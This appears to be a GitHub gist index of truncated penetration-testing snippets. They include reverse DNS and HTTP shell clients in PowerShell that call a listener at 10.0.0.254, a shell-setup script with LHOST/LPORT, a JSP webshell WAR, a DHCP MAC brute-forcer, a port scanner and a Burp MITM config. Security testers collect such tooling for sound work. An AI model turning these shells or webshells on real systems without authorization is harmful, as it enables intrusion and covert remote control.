Frank Spierings FrankSpierings

@FrankSpierings
FrankSpierings / client.ps1
Last active January 11, 2020 11:12
Poor man's Reverse DNS Shell
#
# DNS requests created: <clientid>.<type>.<msgid>.<oftotalids>.<data>.<random>.<domain>
#
Function ConvertTo-Blocks() {
param(
[String]$String,
[int]$Size
)
[Array]$output = @()
for ($i=0; $i -lt $String.Length; $i+=$Size) {
FrankSpierings / plantable.ps1
Last active December 12, 2019 14:27
Reverse HTTP Shell Powershell/Python
$url = "http://10.0.0.254:8000";
$clientid = "1234567";
$polltime = 5;
$wc = New-Object System.Net.WebClient;
$whc = New-Object System.Net.WebHeaderCollection;
$whc.Add("X-Client-Id", $clientid)
$wc.Headers = $whc
while ($true) {
#!/bin/bash
# This is not great...
#
NAME=Shell
TAC=TrustAllCertificates
LHOST=10.0.0.254
LPORT=4444
COMMAND='"powershell"'
CURDIR=$(pwd)
#!/usr/bin/env python3
import argparse
import requests
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import logging
import logging.config
logconfig = {'version': 1,
'disable_existing_loggers': False,
'formatters': {'standard': {'format': '[%(levelname)s] %(message)s'}},
'handlers': {'default': {'level': 'DEBUG',
FrankSpierings / netrange.py
Created October 24, 2019 07:34
Show the network range based on an IP (CIDR)
from netaddr import IPNetwork
network = IPNetwork('192.168.21.2/26')
print('Network: {0} - {1}'.format(network.network, network.broadcast))
FrankSpierings / burp-mitm-config.json
Last active July 21, 2022 14:25
MITM SSID setup
{
"proxy":{
"request_listeners":[
{
"certificate_mode":"per_host",
"listen_mode":"all_interfaces",
"listener_port":8080,
"running":true,
"support_invisible_proxying":true
}
FrankSpierings / port-scan.ps1
Last active August 14, 2019 12:11
Portscanning
#requires -Version 1
function Test-Port
{
Param([string]$ComputerName,$port = 5985,$timeout = 1000)
try
{
$tcpclient = New-Object -TypeName system.Net.Sockets.TcpClient
$iar = $tcpclient.BeginConnect($ComputerName,$port,$null,$null)
$wait = $iar.AsyncWaitHandle.WaitOne($timeout,$false)
FrankSpierings / mac-bruteforce.py
Last active November 12, 2024 13:04
Brute force a mac address using Scapy and DHCP to check the response
import time
from itertools import product
import sys
from scapy.all import *
prefixes = ['001122','445566']
timeout = 10
breakcounter = 255
iface = 'eth0'
FrankSpierings / Readme.md
Last active August 9, 2019 14:21
JSP Webshell

Create WAR

zip -r ../shell.war *

FrankSpierings / scan2db.py
Last active August 18, 2025 12:58
Nmap, Nessus and masscan to sqlite database.
#!/usr/bin/env python3
import logging
import logging.config
import os
import sqlite3
import tempfile
import argparse
import re
from bs4 import BeautifulSoup